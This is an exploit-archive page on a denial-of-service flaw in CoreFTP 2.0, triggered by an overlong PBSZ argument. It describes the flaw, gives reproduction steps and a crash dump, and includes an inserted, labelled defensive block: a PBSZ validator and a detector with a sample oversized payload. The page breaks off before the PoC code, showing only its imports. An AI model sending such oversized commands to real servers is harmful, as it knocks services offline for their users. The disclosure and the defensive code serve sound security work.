Core ftp 2.0 build 653 pbsz denial of service (poc) Vulnerability / Exploit
Exploits / Vulnerability Discovered : 2019-03-12 | Type : dos | Platform : windows
This exploit / vulnerability Core ftp 2.0 build 653 pbsz denial of service (poc) is for educational purposes only and if it is used you will do on your own risk!
# Description:
# CoreFTP 2.0 is vulnerable to a DoS attack via the PBSZ command. Ironically, this command is being used for "Protection Buffer Size"
# and CoreFTP responds unauthenticated.
# Only a string of a certain length passed to the PBSZ command triggers the DoS in CoreFTP.
# This script triggers the DoS by filling ECX with the intended buffer.
# Although NSEH/SEH is overwritten, the executable binary is SafeSEH protected and no other assemblies are referenced.
# Replication:
# - Install CoreFTP and setup a domain with an IP and path
# - Start the service or click "Start"
# - No need to add users or set anything specific: just run the script and watch it crash
# Crash as service:
# (7e0.bf4): Access violation - code c0000005 (first chance)
# First chance exceptions are reported before any exception handling.
# This exception may be expected and handled.
# *** ERROR: Module load completed but symbols could not be loaded for C:\Program Files (x86)\CoreFTPServer\coresrvr.exe
# eax=00000000 ebx=00a5b048 ecx=42424242 edx=00000000 esi=00000258 edi=00000000
# eip=004491f5 esp=0128c4bc ebp=0129f684 iopl=0 nv up ei ng nz na po nc
# cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010282
# coresrvr+0x491f5:
# 004491f5 83b92c08000000 cmp dword ptr [ecx+82Ch],0 ds:002b:42424a6e=????????
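Added example, not part of the PoC nor of CoreFTP's code: the server-side handling whose absence the crash above describes, a PBSZ argument validated as RFC 2228/RFC 4217 specify (numeric, bounded, only after AUTH TLS), plus a detection helper over captured control-channel lines. MAX_LINE, MAX_PBSZ_ARG, the function names and the sample traffic are assumptions for illustration.

```python
import re

# Assumed limits for illustration: a short control-channel line cap and a digit
# cap for the PBSZ argument (RFC 4217 uses "0" for TLS; a 32-bit value needs at
# most 10 decimal digits), so an oversized argument is rejected before parsing.
MAX_LINE = 512
MAX_PBSZ_ARG = 10


def check_pbsz(line, tls_negotiated):
    """Return an FTP reply (code, text) for one raw control-channel line.

    Rejects oversized lines, non-ASCII bytes, non-numeric or overlong
    arguments, and PBSZ sent before AUTH TLS (RFC 4217 sequencing)."""
    if len(line) > MAX_LINE:
        return 500, "Line too long"
    try:
        text = line.rstrip(b"\r\n").decode("ascii")
    except UnicodeDecodeError:
        return 500, "Syntax error"
    verb, _, arg = text.partition(" ")
    if verb.upper() != "PBSZ":
        return 502, "Command not implemented"
    if not tls_negotiated:
        return 503, "PBSZ requires a prior AUTH TLS"
    if not re.fullmatch(r"\d{1,%d}" % MAX_PBSZ_ARG, arg):
        return 501, "Syntax error in parameters or arguments"
    # RFC 4217: the server always answers PBSZ=0 for TLS, whatever was requested.
    return 200, "PBSZ=0"


def flag_oversized_pbsz(lines, limit=MAX_PBSZ_ARG):
    """Detection helper: indices of PBSZ lines whose argument is non-numeric
    or longer than `limit` digits, the shape of input the crash above needs."""
    hits = []
    for i, line in enumerate(lines):
        text = line.rstrip(b"\r\n").decode("ascii", "replace")
        verb, _, arg = text.partition(" ")
        if verb.upper() == "PBSZ" and not re.fullmatch(r"\d{1,%d}" % limit, arg):
            hits.append(i)
    return hits


# Constructed sample control-channel traffic (not captured from CoreFTP).
SAMPLE = [
    b"USER anonymous\r\n",
    b"AUTH TLS\r\n",
    b"PBSZ 0\r\n",
    b"PBSZ " + b"B" * 300 + b"\r\n",
]
```

Running `flag_oversized_pbsz(SAMPLE)` flags only the last line; `check_pbsz` refuses that same line with a 500 reply before its argument is ever examined.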
#!/usr/bin/env python
import sys, socket, struct, time